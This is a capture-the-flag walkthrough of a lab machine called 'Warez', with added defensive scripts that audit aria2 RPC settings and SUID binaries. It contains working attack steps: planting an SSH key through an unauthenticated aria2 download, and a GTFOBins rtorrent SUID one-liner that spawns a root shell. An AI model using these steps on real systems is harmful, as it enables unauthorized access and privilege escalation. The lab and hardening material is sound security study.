Warez

When starting the machine, it shows us its IP address; in this case, it is 192.168.18.190.

To begin, we will perform a scan with Nmap to identify the open ports on the target machine. First, we run a quick scan of all 65535 ports, without service detection, to learn which ones are open:

sudo nmap -sS -p- --min-rate 4500 -n -Pn 192.168.18.190

And now, with the open ports we have identified, we will perform a more in-depth scan:

nmap -sCV -p22,80,6800 -n -Pn 192.168.18.190 -oN target

We observe that port 6800 is running aria2, an open-source download utility that supports protocols such as HTTP, FTP, and BitTorrent.

Browsing the web server on port 80, we find the username carolina.

The next thing we notice is that, by using "Add" under "By URLs", we can make the downloader write a file into any directory. So I'm going to copy my id_rsa.pub to a file called authorized_keys and upload it, so that the victim machine accepts our SSH key for the user carolina.

cp id_rsa.pub authorized_keys

If you don't have the id_rsa.pub file, you can create it with the following command:

ssh-keygen

And with Python, we start a web server on port 8080:

python3 -m http.server 8080

Now we enter the URL where our authorized_keys file is being served and change the destination directory to /home/carolina/.ssh.

We send the command, and now we can access via port 22 (SSH) as the user carolina.
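From the defender's side, what made this step work is an aria2 RPC endpoint that accepts unauthenticated calls and lets the caller pick the download directory while aria2 runs as a real login user. The following is an added example, not part of the original write-up, that audits an aria2 configuration file for exactly those settings. The option names (enable-rpc, rpc-secret, rpc-listen-all, rpc-allow-origin-all, dir) are real aria2 options; the two sample configuration files are constructed, since the real file on the machine was never shown.

```shell
#!/bin/sh
# Added example (not from the write-up): audit an aria2 config file for the
# RPC settings that let any client reaching port 6800 queue a download and
# choose where it lands on disk. Sample configs below are constructed.

# Print the last value given for option $1 in config file $2 (key=value lines).
aria2_opt() {
    grep -E "^[[:space:]]*$1[[:space:]]*=" "$2" | tail -n 1 | cut -d= -f2- | tr -d '[:space:]'
}

# Report risky RPC settings in config file $1; the return value is the number of findings.
audit_aria2_conf() {
    conf="$1"
    findings=0
    if [ "$(aria2_opt enable-rpc "$conf")" = "true" ]; then
        if [ -z "$(aria2_opt rpc-secret "$conf")" ]; then
            echo "FAIL $conf: enable-rpc=true without rpc-secret, the RPC endpoint accepts unauthenticated calls"
            findings=$((findings + 1))
        fi
        if [ "$(aria2_opt rpc-listen-all "$conf")" = "true" ]; then
            echo "WARN $conf: rpc-listen-all=true, RPC is bound to every interface instead of loopback"
            findings=$((findings + 1))
        fi
        if [ "$(aria2_opt rpc-allow-origin-all "$conf")" = "true" ]; then
            echo "WARN $conf: rpc-allow-origin-all=true, any web origin may call the RPC endpoint"
            findings=$((findings + 1))
        fi
    fi
    if [ "$findings" -eq 0 ]; then
        echo "OK $conf: no risky RPC settings found"
    fi
    return "$findings"
}

# Constructed weak config, resembling the exposed setup on the machine.
weak=$(mktemp)
printf '%s\n' 'enable-rpc=true' 'rpc-listen-all=true' 'rpc-allow-origin-all=true' 'dir=/home/carolina' >"$weak"

# Constructed hardened config: shared secret, loopback only, downloads owned by a dedicated service account.
hardened=$(mktemp)
printf '%s\n' 'enable-rpc=true' 'rpc-secret=CHANGE-ME-long-random-token' 'rpc-listen-all=false' 'dir=/var/lib/aria2/downloads' >"$hardened"

audit_aria2_conf "$weak" || true       # three findings
audit_aria2_conf "$hardened" || true   # OK
rm -f "$weak" "$hardened"
```

Note that rpc-secret only authenticates the caller; an authenticated client can still override dir per download. The part that turned a download into an SSH backdoor was aria2 running as carolina, so the complete fix is the secret plus running the daemon as a dedicated account that has no shell login and no .ssh directory worth writing to.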

Let's check how many users are on the machine. It appears that there are only two users: carolina and root.

cat /etc/passwd | grep /bin/bash

Additionally, we can obtain the user flag. Time for privilege escalation.

We enumerate the SUID binaries on the machine, and there is one that we can use to escalate to root very easily. The relevant binary is rtorrent.

We search GTFOBins, which gives a way to escalate to root through this SUID binary by running the following commands:

echo "execute = /bin/sh,-p,-c,\"/bin/sh -p <$(tty) >$(tty) 2>$(tty)\"" >~/.rtorrent.rc
/usr/bin/rtorrent
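The reason this works is that rtorrent reads ~/.rtorrent.rc from the invoking user's home, so any SUID copy of it hands root to whoever can write that file. A defender catches this by keeping a per-host baseline of SUID binaries and reviewing anything outside it. The following is an added example, not part of the original write-up: a small check that diffs the SUID binaries found on a host against an allowlist. The find command is the standard way to list SUID files; the sample lists are constructed, with /usr/bin/rtorrent included as the odd one out.

```shell
#!/bin/sh
# Added example (not from the write-up): flag SUID binaries that are not on
# a reviewed allowlist. Sample path lists below are constructed.

# Collect the SUID binaries of the live host into file $1, one path per line, sorted.
collect_suid() {
    find / -xdev -type f -perm -4000 2>/dev/null | sort >"$1"
}

# Print lines of $1 (one path per line) that do not appear exactly in allowlist $2.
unexpected_suid() {
    grep -vxF -f "$2" "$1" || true   # grep exits 1 when nothing is unexpected; that is not an error here
}

# Constructed snapshot of what find would report on the box.
found=$(mktemp)
printf '%s\n' /usr/bin/passwd /usr/bin/rtorrent /usr/bin/su /usr/bin/sudo >"$found"

# Constructed baseline for this image. Keep one per host and review every diff;
# a program that reads config from the user's home should never be on it.
allow=$(mktemp)
printf '%s\n' /usr/bin/passwd /usr/bin/su /usr/bin/sudo >"$allow"

unexpected_suid "$found" "$allow"   # prints /usr/bin/rtorrent
rm -f "$found" "$allow"

# Remediation for a hit like this one is to drop the bit:  chmod u-s /usr/bin/rtorrent
```

On a real host you would run collect_suid once after provisioning to seed the allowlist, then run collect_suid plus unexpected_suid from cron or a config-management check and alert on any output.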

And now we are root. Let's obtain the root flag, and we're done. Machine completed!
